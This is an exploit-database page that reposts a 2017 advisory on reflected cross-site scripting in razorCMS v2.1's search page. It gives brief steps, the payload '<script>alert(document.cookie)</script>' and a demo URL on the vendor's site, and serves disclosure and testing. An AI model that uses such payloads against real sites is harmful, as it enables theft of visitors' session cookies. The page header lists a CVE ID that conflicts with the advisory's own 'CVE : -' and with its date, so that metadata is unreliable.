Advertisement






razorCMS v2.1 Cross Site Scripting

CVE Category Price Severity
CVE-2019-10173 CWE-79 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2017-03-31
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:F/RL:W/RC:C 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017030256

Below is a copy:

razorCMS v2.1 Cross Site Scripting##########################
# Exploit Title: razorCMS v2.1 Cross Site Scripting
# Google Dork: N/A
# Date: 2017-03-30
# Exploit Author: Sh4dow
# My Team:Zero Security Group
# Vendor Homepage: http://razorcms.co.uk/
# Software Link: http://v2.razorcms.co.uk/archive/core/razorCMS_phoenix_v2_1.zip
# Version: v2.1
# Tested on: Kali Linux
# CVE : -
##########################

Step by step to do:

step1: Go To site
Step2: Go to the search site
Step3: xss write your own script and press enter
 (   <script>alert(document.cookie)</script>   )
----------------------------------------

Demo:
http://v2.razorcms.co.uk/razor-SiteSearch.htm

----------------------------------------
# Greetz : Sh4dow And My Pc
# We Are:Sh4dow - Ghostman - SOLTAN SILENT - And All Member
# Iranian Underground Researchers
# https://telegram.me/ZeroSecOfficial

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum